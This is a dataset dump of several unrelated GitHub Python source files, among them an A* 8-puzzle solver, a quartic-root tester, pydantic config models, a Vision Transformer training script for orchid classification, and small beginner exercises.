sorted(variables):\n print(var, \"=\", sol[var])\n print()\n","repo_name":"ngffy/artificial-intelligence-hw","sub_path":"HW2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7955834356","text":"from priorityqueue import Priority_Queue\nimport math\n\ndef nextState(aState):\n \"\"\"return the availavel state\"\"\"\n state = aState.st\n #find the moveable piece\n for i in range(3):\n for j in range(3):\n if state[i][j] == 0:\n blankX = i\n blankY = j\n break\n # index 0 index 1 index 2 index 3\n #assigning number to each possible state, so it won't go back\n nextS = [(blankX+1,blankY,1),(blankX-1,blankY,0),(blankX,blankY-1,3),(blankX,blankY+1,2)]\n \n #remember where it comes from, and delete the state which may go back to previouse state\n if aState.ls != 4:\n del nextS[aState.ls]\n\n validS = []\n #check whether or not the reamining state is valid,make sure it won't move out\n for item in nextS:\n if (item[0] >= 0 and item[0] < 3) and (item[1] >= 0 and item[1] < 3):\n tempS = list(map(list,state))\n x = state[item[0]][item[1]]\n tempS[blankX][blankY] = x\n tempS[item[0]][item[1]] = 0\n #if if valid, creat the object and append it into the list\n validS.append(State(aState.key, list(map(list,tempS)), item[2], aState.step+1))\n\n return validS\n\n\ndef hFrist(validS):\n global goal\n \"\"\"hamming distance heuristic\"\"\"\n for itemState in validS:\n item = itemState.st\n misplaced = 0\n for i in range(3):\n for j in range(3):\n if item[i][j] != goal[i][j]:\n misplaced += 1\n itemState.key = (itemState.step + misplaced)\n return validS\n\ndef hSecond(validS):\n global goal\n \"\"\"manhattan distance heuristic\n \"\"\"\n for itemState in validS:\n item = itemState.st\n step = 0\n for i in range(3):\n for j in range(3):\n k = item[i][j]\n for x in range(3):\n for y in range(3):\n if goal[x][y] == k:\n step += (abs(x-i) + abs(y-j))\n #the mistate make in hSecond, causes a lot of more work\n #step += abs(((x-i) + (y-j)))\n itemState.key = (step + itemState.step)\n \n return validS\n\ndef hThird(validS):\n \"\"\"heuristic thiree, take the acutual distance as cose function, with diagnose, we don't use \n a + b, insted the cost become sqt(a**2 + b**2)\n \"\"\"\n for itemState in validS:\n item = itemState.st\n step = 0\n for i in range(3):\n for j in range(3):\n k = item[i][j]\n for x in range(3):\n for y in range(3):\n if goal[x][y] == k:\n \"\"\"the search cost is less, but it's not the optimal one\"\"\"\n #admissible heuristic, \n #step += ((abs(x-i))**2 + (abs(y-j))**2)\n\n #this one is better than heuristic one but worse than heuristic two\n step += math.sqrt((abs(x-i))**2 + (abs(y-j))**2)\n\n itemState.key = (step + itemState.step)\n \n return validS\n\ndef nextMove(state, first = False):\n \"\"\"combine the state function and heuristic funtion\n the frist deteminte whether run the first heuristic or second\n \"\"\"\n nextS = nextState(state)\n if first:\n return hFrist(nextS)\n else:\n return hSecond(nextS)\n\n\nclass State:\n def __init__(self, k,st,last, step):\n \"\"\"this State has 4 arrtibues\n key stands for the heuristic cost + the step cost\n st stands for the puzzle's state\n ls stands for how does it changed from last state, either top,down,right or left.\n step stands for the step cost from the start state to current state\n \"\"\"\n self.key = k\n self.st = st\n self.ls = last\n self.step = step\n\n def precede(self, x):\n return self.key < 
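# hSecond() above finds each tile's goal position with four nested loops. Building a
# {tile: (row, col)} map for the goal once gives the Manhattan-distance heuristic in
# a single pass; unlike hSecond() this sketch skips the blank tile (0), which is the
# usual admissible formulation:

def manhattan_distance(state, goal):
    goal_pos = {goal[r][c]: (r, c) for r in range(3) for c in range(3)}
    total = 0
    for r in range(3):
        for c in range(3):
            tile = state[r][c]
            if tile != 0:
                gr, gc = goal_pos[tile]
                total += abs(gr - r) + abs(gc - c)
    return total

# manhattan_distance([[1, 2, 3], [4, 5, 6], [0, 7, 8]],
#                    [[1, 2, 3], [4, 5, 6], [7, 8, 0]]) -> 2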
x.key # do not use <= or >=\n\n def assign(self, v): # v must be of higher priority value than the current key\n x = State(v, self.st, self.ls,self.step) # x is a local temporary instance\n if not self.precede(x):\n self.key = v\n return True\n else:\n return False\n\ndef showPuzzle(arr):\n \"\"\"a function to print the puzzle nicely\"\"\"\n for i in range(3):\n for j in range(3):\n print(str(arr[i][j]) + \" \", end='')\n print()\n\nprint(\"1,2,3\\n4,5,6\\n7,8,0\\n-------\")\nstart = []\ngoal = []\n\n#obtaining the start state\nfor i in range(3):\n temp = input().split(',')\n start.append([int(temp[0]), int(temp[1]), int(temp[2])])\n\n#obtaining the goal state\nfor i in range(3):\n temp = input().split(',')\n goal.append([int(temp[0]), int(temp[1]), int(temp[2])])\n\nstartS = State(0, start,4,0)\n\npq = Priority_Queue()\npq.enqueue(startS)\n\npath = {}\nfinalState = None\n\ncount = 0\nwhile pq:\n current = pq.dequeue()\n count += 1\n if current.st == goal:\n finalState = current\n print(\"The total cost is \" + str(current.step))\n #showPuzzle(current.st)\n break\n else:\n #print(\"The cost is \" + str(current.step))\n #showPuzzle(current.st)\n nextS = nextMove(current)\n for item in nextS:\n pq.enqueue(item)\n #remebering where it comes from and store it as a dictonary\n path[item] = current\n\nprint(\"total search is \" + str(count))\n\n\ncurrent = finalState\nret = []\nret.append(goal)\ncount = 0\n# get the puzzle from goal back to the start\nwhile current.st != start:\n current = path[current]\n ret.append(current.st)\n count += 1\n if count == 100000:\n print(\"wrong\")\n\n# print the puzzle from start to goal\ncount = 0\nfor i in range(len(ret)-1, -1, -1):\n print(\"\\nstep \" + str(count) + \" is:\")\n count += 1\n showPuzzle(ret[i])\n\n \n\n\n\n\n","repo_name":"finbaar/Astar","sub_path":"Astar.py","file_name":"Astar.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31324894554","text":"from Consistent_cRoot import *\n\nfrom decimal import Decimal, getcontext\nfrom random import randint\n\n\n# This function tests various things, what inputs are necessary to produce imaginary roots with negative real parts,\n# the main purpose, though is to figure out under what conditions is 2ad - bc/3 + bM4/3 + bM5/3 negative or positive\ndef P2_sw(switch_num):\n if switch_num < 5:\n return 1\n elif switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n return -1\n\ndef P3_sw(switch_num):\n if switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n if (switch_num - 1) % 4 < 2:\n return 1\n else:\n return -1 \n \ndef P5_sw(switch_num):\n if switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n if switch_num % 2 == 1:\n return 1\n else:\n return -1 \n\ndef getM4(A, B, C, D, E):\n M1 = Decimal(72*A*C*E - 27*A*D*D - 27*B**2*E + 9*B*C*D - 2*C**3)\n\n M2 = Decimal(12*A*E - 3*B*D + C*C)\n\n M6_real, M6_imag =c_square_root(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n\n input_r, input_i = Decimal(M1/2 + M6_real/2), Decimal(M6_imag/2)\n if abs(input_r) < 1e-26:\n input_r = Decimal(0)\n if abs(input_i) < 1e-26:\n input_i = Decimal(0)\n M4_real, M4_imag =c_cube_root(input_r, input_i)\n return 2*M4_real\n\ndef test_p2p5(A, B, C, D, E, Debug=False, switch=1):\n\n\n M1 = Decimal(72*A*C*E - 27*A*D*D - 27*B**2*E + 9*B*C*D - 2*C**3)\n\n M2 = 
Decimal(12*A*E - 3*B*D + C*C)\n\n M6_real, M6_imag =c_square_root(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n if Debug:\n print(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n print(M6_real**2 - M6_imag**2)\n input()\n\n input_r, input_i = Decimal(M1/2 + M6_real/2), Decimal(M6_imag/2)\n if abs(input_r) < 1e-26:\n input_r = Decimal(0)\n if abs(input_i) < 1e-26:\n input_i = Decimal(0)\n M4_real, M4_imag =c_cube_root(input_r, input_i)\n if Debug:\n print(input_r, input_i)\n print(M4_real**3 - 3*M4_real*M4_imag**2, 3*M4_real**2*M4_imag - M4_imag**3)\n input()\n\n \n\n if (6*A*D - B*C + 2*B*M4_real) > 0:\n return 1\n elif (6*A*D - B*C + 2*B*M4_real) == 0:\n return 0\n else:\n return -1\n # if (M4_real ) < 0:\n # return -1\n # elif M4_real > 1:\n # return 1\n # else:\n # return 0\n\ndef func(a, b, c, d, e, x_real, x_imag):\n output_real = Decimal(a*x_real**4 - 6*a*x_real**2*x_imag**2 + a*x_imag**4)\n output_imag = Decimal(4*a*x_real**3*x_imag - 4*a*x_real*x_imag**3)\n\n\n output_real += Decimal(b*x_real**3 - 3*b*x_real*x_imag**2)\n output_imag += Decimal(3*b*x_real**2*x_imag - b*x_imag**3)\n\n\n output_real += Decimal(c*x_real**2 - c*x_imag**2)\n output_imag += Decimal(2*c*x_real*x_imag)\n\n\n output_real += Decimal(d*x_real)\n output_imag += Decimal(d*x_imag)\n\n\n output_real += Decimal(e)\n\n\n\n\n return output_real, output_imag\n\n\ndef makeDecimal(a,b,c,d,e):\n A = Decimal(a)\n if A == 0:\n A = Decimal(1)\n B = Decimal(b)\n C = Decimal(c)\n D = Decimal(d)\n E = Decimal(e)\n return A, B, C, D, E\n\n\n\nTest = True\nif Test == True:\n Fd = False\n for i in range(400):\n # stopped at 57697\n a,b,c,d,e = randint(-10, 10), randint(-10, 10), randint(-10, 10), randint(-10, 10), randint(-10, 10)\n if a == 0:\n a = 1\n a,b,c,d,e = makeDecimal(a,b,c,d,e)\n\n\n passed = test_p2p5(a,b,c,d,e)\n if passed == 1 and a*d**2 > e*b**2:\n print(f\"{a} {b} {c} {d} {e}\")\n print(f\"{a*d*d} {b*b*e}\")\n print(f\"{b*c - 6*a*d}\")\n M4 = getM4(a, b, c, d, e)\n print(M4)\n break\n \n\n \n \n\n\n\n","repo_name":"EloMalakhi/Polynomialic-formulas","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38542960864","text":"# static analysis: ignore\n\"\"\"Base classes for building the models used by the package.\"\"\"\n\n# Future imports\nfrom __future__ import (\n annotations,\n)\n\n# Standard library imports\nimport abc\nfrom typing import (\n Mapping,\n)\n\n# Third party imports\nimport pydantic\n\n# Local imports\nimport submanager.models.utils\nfrom submanager.models.types import (\n ItemIDStr,\n StripStr,\n)\n\n\nclass CustomBaseModel(\n pydantic.BaseModel,\n validate_all=True,\n extra=pydantic.Extra.forbid,\n allow_mutation=False,\n validate_assignment=True,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Locally-customized Pydantic BaseModel.\"\"\"\n\n\nclass CustomMutableBaseModel(\n CustomBaseModel,\n allow_mutation=True,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Custom BaseModel that allows mutation.\"\"\"\n\n\nclass ItemConfig(CustomBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for an atomic unit in the config hierarchy.\"\"\"\n\n description: pydantic.StrictStr = \"\"\n enabled: bool = True\n uid: ItemIDStr\n\n\nclass ContextConfig(CustomBaseModel):\n \"\"\"Local context configuration for the bot.\"\"\"\n\n account: StripStr\n subreddit: StripStr\n\n @pydantic.validator(\"account\", pre=True)\n def check_account_found( # pylint: disable = no-self-use, no-self-argument\n cls,\n value: 
submanager.models.utils.MissingAccount | str,\n ) -> str:\n \"\"\"Check that the account is present in the global accounts table.\"\"\"\n if isinstance(value, submanager.models.utils.MissingAccount):\n raise ValueError(\n f\"Account key '{value}' not listed in accounts table\",\n )\n return value\n\n\nclass ItemWithContextConfig(ItemConfig, metaclass=abc.ABCMeta):\n \"\"\"Base class reprisenting a config item that has a Reddit context.\"\"\"\n\n context: ContextConfig\n\n\nclass DynamicItemConfig(CustomMutableBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for the dynamic configuration of a generic item.\"\"\"\n\n\nclass ManagerConfig(CustomBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for manager modules.\"\"\"\n\n enabled: bool = True\n\n\nclass ItemManagerConfig(ManagerConfig, metaclass=abc.ABCMeta):\n \"\"\"Base class for managers that deal with arbitrary discrete items.\"\"\"\n\n items: Mapping[StripStr, ItemConfig] = {}\n\n\nclass DynamicItemManagerConfig(CustomMutableBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for dynamic config for ItemManagers.\"\"\"\n\n items: Mapping[StripStr, DynamicItemConfig] = {}\n","repo_name":"r-spacex/submanager","sub_path":"src/submanager/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"74673582480","text":"# import package \nimport PIL\nfrom PIL import Image, ImageFile\nimport PIL.ImageOps\nimport PIL.ImageEnhance\nimport PIL.ImageDraw\nimport torch\nfrom torch import optim\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torchvision.datasets import ImageFolder\nimport random\nimport math\nimport numpy as np\nimport pandas as pd\nimport torchvision\nimport matplotlib.pyplot as plt\nimport opendatasets as od\nfrom torchsummary import summary\nfrom functools import partial\nimport timm\nfrom timm.models.vision_transformer import VisionTransformer, _cfg\nfrom timm.loss import LabelSmoothingCrossEntropy\nfrom timm.models.layers import trunc_normal_\nfrom timm.data.mixup import Mixup\nfrom timm.data.auto_augment import rand_augment_transform\nfrom timm.data.transforms import RandomResizedCropAndInterpolation\nfrom torchvision.transforms import InterpolationMode\nfrom timm.scheduler import CosineLRScheduler\nfrom tqdm import tqdm \nfrom sklearn.model_selection import train_test_split\n\n# %%\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nnum_classes = 219\n\n\n# %%\n\n\n# hyperparameter\nbatch_size = 64\n\nepochs = 200\n\nlr = 0.0001\nwarmup_epoch = 5\n\n\n# %%\n\n\nrand_aug = rand_augment_transform(\n config_str=\"rand-m9-mstd0.5-inc1\",\n hparams=dict(\n translate_const=int(224 * 0.45),\n img_mean=tuple([min(255, round(255 * x)) for x in (0.5071, 0.4867, 0.4408)]),\n )\n)\n\n\n# %%\n\n\n# Use when training, don't put it in transforms\nmixup_args = {\n 'mixup_alpha': 0.3,\n 'cutmix_alpha': 0.4,\n 'cutmix_minmax': None,\n 'prob': 0.7,\n 'switch_prob': 0.,\n 'mode': 'batch',\n 'label_smoothing': 0,\n 'num_classes': num_classes\n }\nmixup_cutmix = Mixup(\n **mixup_args\n)\n\n\n# %%\n\n\n# Create transforms\nstats = (0.485, 0.456, 0.406), (0.229, 0.224, 0.225)\n\nMEAN = (0.485, 0.456, 0.406)\nSTD = (0.229, 0.224, 0.225)\n\nrandom_transform = RandomResizedCropAndInterpolation(size=224, scale=(0.8, 1.0))\nrandom_transform.interpolation = InterpolationMode.BILINEAR\n\ntrain_tfms 
= transforms.Compose([\n random_transform,\n rand_aug,\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(*stats),\n])\n\ntest_tfms = transforms.Compose([\n transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize(*stats)\n])\n\n\n# %%\n\nclass FlowerDataset(Dataset):\n def __init__(self, root=\"comp_orchid\", label_file=\"comp_orchid/label.csv\", transform=None, **kwargs):\n self.root = root\n \n if isinstance(label_file, str):\n self.data = pd.read_csv(label_file)\n else:\n self.data = label_file\n \n if transform is not None:\n self.transform = transform\n else:\n normalize = transforms.Normalize(\n mean=MEAN,\n std=STD\n )\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize\n ]) \n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, idx):\n label = self.data.iloc[idx, 1]\n \n img_path = self.data.iloc[idx, 0]\n img = Image.open(f\"{self.root}/{img_path}\").convert(\"RGB\")\n \n img = self.transform(img)\n \n return img, label\n \n \ndef split_train_test(label_file):\n data = pd.read_csv(label_file)\n unique_cls = np.unique(data.iloc[:, 1])\n \n eval_idx = []\n for cls in unique_cls:\n eval_idx.extend((data[data.iloc[:, 1] == cls].sample(n=1, random_state=0).index).tolist())\n\n train_file = data[~data.index.isin(eval_idx)]\n test_file = data[data.index.isin(eval_idx)]\n \n return train_file.reset_index(drop=True), test_file.reset_index(drop=True) \n\n\ndef make_loader(batch_size, img_root, label_file=None,\n shuffle=True, transform=None, drop_last=False,\n num_workers=2, pin_memory=True):\n dataset = FlowerDataset(root=img_root, label_file=label_file, transform=transform)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, pin_memory=pin_memory,\n shuffle=shuffle, drop_last=drop_last, num_workers=num_workers\n )\n return dataloader\n\n\ntrain_csv, test_csv = split_train_test(\"./comp_orchid/label.csv\")\n\n# %%\n\n\n# Create Dataloder\ntrain_loader = make_loader(batch_size=batch_size, \n img_root=\"./comp_orchid\",\n shuffle=True, \n transform=train_tfms,\n label_file=train_csv)\n\ntest_loader = make_loader(batch_size=batch_size,\n img_root=\"./comp_orchid\",\n shuffle=False,\n transform=test_tfms,\n label_file=test_csv)\n\n\n# %%\n\n\n# Create device\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n# %%\nclass mymodel(nn.Module):\n def __init__(self):\n super().__init__()\n self.vit = timm.create_model('vit_base_patch16_224_in21k', pretrained=True, num_classes = num_classes)\n def forward(self, x):\n x = self.vit(x)\n return x\n\n# model = deit_tiny_patch16_224(pretrained=True).to(device)\n\n# model = nn.Sequential(nn.Upsample(size=(224,224), mode='bilinear'), model)\n# model = \nmodel = mymodel()\n\n# %%\n# model.head = nn.Linear(192, num_classes)\n\n\n# %%\n\n\nprint(model)\n\n\n# %%\n\n\nmodel = model.to(device)\n\n# model = torch.nn.DataParallel(model)\n# %%\n\n\ndef adjust_learning_rate(optimizer, epoch):\n learn_rate = lr\n if epoch < warmup_epoch:\n learn_rate = learn_rate / (warmup_epoch - epoch)\n else:\n learn_rate *= 0.5 * (1. 
+ math.cos(math.pi * (epoch - warmup_epoch) / (epochs - warmup_epoch)))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = learn_rate\n\n\n# %%\n\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=lr)\n# optimizer = torch.optim.SGD(model.parameters(), momentum=0.9, lr=lr)\n\ncriterion = nn.CrossEntropyLoss()\n\n\n# %%\n\n\nnoise_args = dict(\n noise_range_t=None,\n noise_pct=0.67,\n noise_std=1.,\n noise_seed=42\n)\n\nlr_scheduler = CosineLRScheduler(\n optimizer,\n t_initial=epochs,\n t_mul=1.0,\n lr_min=1e-5,\n decay_rate=0.1,\n warmup_lr_init=5e-5,\n warmup_t=3,\n cycle_limit=1,\n t_in_epochs=True,\n **noise_args,\n)\n\n# %%\n\n\ndef get_lr_per_epoch(scheduler, num_epoch):\n lr_per_epoch = []\n for epoch in range(num_epoch):\n lr_per_epoch.append(scheduler.get_epoch_values(epoch))\n return lr_per_epoch\n\nlr_per_epoch = get_lr_per_epoch(lr_scheduler, epochs)\nplt.plot([i for i in range(epochs)], lr_per_epoch, label=\"With warmup\");\n\n\ntest_scheduler = CosineLRScheduler(optimizer, t_initial=epochs)\nlr_per_epoch = get_lr_per_epoch(test_scheduler, epochs)\nplt.plot([i for i in range(epochs)], lr_per_epoch, label=\"Without warmup\", alpha=0.8)\n\nplt.legend()\n\n\n# %%\n\n\ntotal_train_loss_history = []\ntrain_accuracy_history = []\ntotal_test_loss_history = []\ntest_accuracy_history = []\nbest_accuracy = 0\n\n\n# %%\n\n\nfor epoch in range(epochs):\n total_train_loss = 0\n train_accuracy = 0\n total_test_loss = 0\n test_accuracy = 0\n\n steps = 0\n total_steps = len(train_loader)\n model.train()\n adjust_learning_rate(optimizer, epoch)\n num_updates = (epoch) * len(train_loader)\n for image, label in tqdm(train_loader):\n steps += 1\n image = image.to(device)\n label = label.to(device)\n \n# image, label = mixup_cutmix(image, label)\n\n output = model(image)\n# label = label.argmax(-1)\n \n optimizer.zero_grad()\n train_loss = criterion(output, label)\n train_loss.backward()\n # nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n\n total_train_loss += train_loss.item() \n prediction = output.argmax(-1) == label\n train_accuracy += prediction.sum().item() / label.size(0)\n\n # lr_scheduler.step_update(num_updates, None)\n\n # lr_scheduler.step(epoch + 1, None)\n\n model.eval()\n with torch.no_grad():\n for test_image, test_label in test_loader:\n test_image = test_image.to(device)\n test_label = test_label.to(device)\n \n test_output = model(test_image)\n test_loss = criterion(test_output, test_label)\n \n total_test_loss += test_loss.item()\n test_prediction = test_output.argmax(-1) == test_label\n test_accuracy += test_prediction.sum().item() / test_label.size(0)\n\n total_train_loss_history.append(total_train_loss / len(train_loader))\n total_test_loss_history.append(total_test_loss / len(test_loader))\n train_accuracy_history.append(train_accuracy / len(train_loader) * 100)\n test_accuracy_history.append(test_accuracy / len(test_loader) * 100)\n\n print(\"Epoch {}\".format(epoch+1))\n print(\"Train loss : {}\".format(total_train_loss / len(train_loader)))\n print(\"Test loss : {}\".format(total_test_loss / len(test_loader)))\n print(\"Train accuracy : {}\".format(train_accuracy / len(train_loader) * 100))\n print(\"Test accuracy : {}\".format(test_accuracy / len(test_loader) * 100))\n if test_accuracy / len(test_loader) * 100 > best_accuracy:\n best_accuracy = test_accuracy / len(test_loader) * 100\n torch.save(model.state_dict(), \"./vit_base_patch16_224_in21k.pth\")\n print(\"Save model\")\n 
print(\"=================================================\")\n\n\n# %%\n\n\n# Plot loss and accuracy\nfig = plt.figure(figsize=(15, 6)) \nsub1 = fig.add_subplot(1, 2, 1) \nsub2 = fig.add_subplot(1, 2, 2) \n\n\nsub1.set_xlabel(\"Epochs\")\nsub1.set_ylabel(\"Accuracy %\")\n\nsub1.plot(train_accuracy_history, color=\"green\", label=\"Training ACC\")\nsub1.plot(test_accuracy_history, color=\"orange\", label=\"Test ACC\")\nsub1.legend(loc=4)\n\nsub2.set_xlabel(\"Epochs\")\nsub2.set_ylabel(\"Loss\")\n\nsub2.plot(total_train_loss_history, color=\"green\", label=\"Training Loss\")\nsub2.plot(total_test_loss_history, color=\"orange\", label=\"Test Loss\")\nsub2.legend(loc=1)\n\nplt.savefig('vit_base_patch16_224_in21k.png')\n\n\n# %%\n\n# Load weight with best accuracy\nmodel.load_state_dict(torch.load(\"./vit_base_patch16_224_in21k.pth\"))\n\n\n# %%\n\n\n# fixed testing process\ncorrect = 0\ntotal = 0\n# since we're not training, we don't need to calculate the gradients for our outputs\nwith torch.no_grad():\n for data in test_loader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n # calculate outputs by running images through the network\n outputs = model(images)\n # the class with the highest energy is what we choose as prediction\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\nprint(f'Accuracy of the network on the 10000 test images: {100 * correct / total:.2f} %')\n\n\n","repo_name":"JoyPang123/flower-compeition","sub_path":"vit_no_ssl.py","file_name":"vit_no_ssl.py","file_ext":"py","file_size_in_byte":11068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3807300138","text":"name = input(\"File name:\")\ntry:\n rfile = open(name)\nexcept:\n print(\"Wrong file name!\")\n quit()\nwords = dict()\n\nfor str in rfile:\n str = str.rstrip()\n splited = str.split()\n\n if (len(splited) == 0): continue\n for word in splited:\n if (word in words):\n words[word] += 1\n else: \n words[word] = 1\n # words[word] = words.get(word, 0) + 1\n\nmostBigWord = None\nmostBigCount = 0\n\nfor word, count in words.items():\n if (mostBigWord is None and mostBigCount == 0):\n mostBigWord = word\n mostBigCount = count\n \n if (count > mostBigCount):\n mostBigWord = word\n mostBigCount = count\n\nprint(\"MostBigWord:\", mostBigWord, \"MostBigCount:\", mostBigCount)","repo_name":"Kyeong1024/python_practice","sub_path":"chapter9.py","file_name":"chapter9.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29183547027","text":"from infra.qyp.account_manager.src.action.list_user_accounts import (set_personal_limits, set_personal_usage,\n cast_yp_resources\n )\n\nfrom infra.qyp.proto_lib import vmset_pb2\nimport mock\nimport yp.data_model as data_model\nfrom yt_yson_bindings import dumps_proto\n\n\ndef test_set_personal_limits():\n lim = vmset_pb2.ResourceTotals()\n q = {\n 'mem': 1024, 'cpu': 1000, 'segment': 'dev', 'internet_address': 0,\n 'disk': [\n {'storage': 'ssd', 'bandwidth_guarantee': 0, 'capacity': 322122547200},\n {'storage': 'hdd', 'bandwidth_guarantee': 222, 'capacity': 111}\n ]\n }\n set_personal_limits(lim, q)\n assert lim.per_segment['dev'].mem == q['mem']\n assert lim.per_segment['dev'].cpu == q['cpu']\n assert lim.per_segment['dev'].cpu == q['cpu']\n assert lim.per_segment['dev'].cpu == q['cpu']\n lim.per_segment['dev'].disk_per_storage['ssd'] 
= q['disk'][0]['capacity']\n lim.per_segment['dev'].disk_per_storage['hdd'] = q['disk'][1]['capacity']\n\n\ndef test_set_personal_usage(pod_client_mock):\n spec1 = data_model.TPodSpec()\n spec1.resource_requests.vcpu_guarantee = 100\n spec1.resource_requests.memory_guarantee = 256\n gpu1 = spec1.gpu_requests.add()\n gpu1.model = 'model1'\n gpu1.id = 'gpuid1'\n gpu2 = spec1.gpu_requests.add()\n gpu2.model = 'model1'\n gpu2.id = 'gpuid2'\n d = spec1.disk_volume_requests.add()\n d.id = 'test_id'\n d.storage_class = 'ssd'\n d.quota_policy.capacity = 128\n spec2 = data_model.TPodSpec()\n spec2.resource_requests.vcpu_guarantee = 128\n spec2.resource_requests.memory_guarantee = 256\n\n pods_result = mock.Mock()\n val1 = mock.Mock()\n val1.values = [dumps_proto(spec1)]\n val2 = mock.Mock()\n val2.values = [dumps_proto(spec2)]\n pods_result.results = [val1, val2]\n pod_client_mock.get_pods.return_value = pods_result\n usage = vmset_pb2.ResourceTotals()\n set_personal_usage(pod_client_mock, usage, {'dev': ['test_id'], 'gpu_dev': ['test_id']})\n assert usage.per_segment['dev'].cpu == 228\n assert usage.per_segment['dev'].mem == 512\n assert usage.per_segment['dev'].disk_per_storage['ssd'] == 128\n assert usage.per_segment['dev'].internet_address == 0\n assert usage.per_segment['dev'].gpu_per_model['model1'] == 2\n assert usage.per_segment['gpu_dev'].cpu == 228\n assert usage.per_segment['gpu_dev'].mem == 512\n assert usage.per_segment['gpu_dev'].disk_per_storage['ssd'] == 128\n assert usage.per_segment['gpu_dev'].internet_address == 0\n assert usage.per_segment['gpu_dev'].internet_address == 0\n assert usage.per_segment['gpu_dev'].gpu_per_model['model1'] == 2\n\n\ndef test_cast_yp_resources():\n pb = vmset_pb2.ResourceInfo()\n r = data_model.TPerSegmentResourceTotals()\n r.memory.capacity = 64\n r.cpu.capacity = 100\n r.disk_per_storage_class['ssd'].capacity = 256\n r.disk_per_storage_class['ssd'].bandwidth = 14\n r.network.bandwidth = 8\n\n cast_yp_resources(pb, r)\n assert pb.mem == 64\n assert pb.cpu == 100\n assert pb.disk_per_storage['ssd'] == 256\n assert pb.io_guarantees_per_storage['ssd'] == 14\n assert pb.network_guarantee == 8\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_list_user_accounts_action.py","file_name":"test_list_user_accounts_action.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3863486330","text":"class User:\n #pass # can leave the class empty if you just want to declare it and not define it, use pass keyword\n # classes use PascalCase (EveryNewWord's starting letter should be Caps)\n # camelCase\n # snake_case\n #constructor: special function known by python and it is known because it has two underscores at the starting of it and the ending of it\n # def __init__(self): self is the actual object that is being created or being initialized.\n # in addition to self you can pass as many parameters as you want and that parameter is\n # going to be passed in when an object gets constructed from this class.\n # once you recieve this data you can use it to set the object's attributes\n #initialize attributes\n def __init__(self, user_id, username):\n self.id = user_id\n self.username = username\n self.followers = 0\n self.following = 0\n print(\"new user being created...\")\n\n def follow(self, user): #unlike a function, a method always needs to have a self parameter as the first parameter\n user.followers += 1 #this means that when this 
method is called, it knows the object that called it.\n self.following += 1\n\nuser_1 = User(\"001\", \"tanish\")\nprint(user_1.username)\nprint(user_1.id)\nprint(user_1.followers)\n\nuser_2 = User(\"002\", \"muskan\")\n\nuser_1.follow(user_2)\nprint(user_1.followers)\nprint(user_1.following)\nprint(user_2.followers)\nprint(user_2.following)\n","repo_name":"Tanish57/Python","sub_path":"Day17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11112180912","text":"# This is a simple game run on Easel Python Game Engine. It is served as a tutorial of how to creat a game using Easel_PY\n# Author: Qianji Zheng, Texas Tech Univeristy\n# Date Created: 2/21/2015\n# Date Last Modified: 2/21/2015\n#\n\n# This is a simpified version of breakout game. The game is played on a 1000*700 pixels window. There are a ball, a bat and an empty wall in the game.\n# The wall is 800*600. The ball is a 17*17 image. The bat is a 80*12 image.\n# When the game starts, the bar is placed 200 pixel above the bottom of the wall and the ball is placed right on top the bat. The ball starts bouncing off to up-right \n# with speed (7,7). When the ball hits the right of the wall, it bonces to the left-up, in otherwords, the speed is (-7,7). If the ball hits the top of the wall,\n# its speed is (-7,-7).\n# When the ball hits the wall or the bat, it bounces off. When the bat miss the ball, the game is over. The player hold down \"a\" or \"d\" to move the bat to the left or right.\n# When the ball hits the bat, the speed of the ball increase.\n\n\n# EaselLib must be imported before writing any user defined functions\nfrom EaselLib import *\n\n# define a 1000*700 window 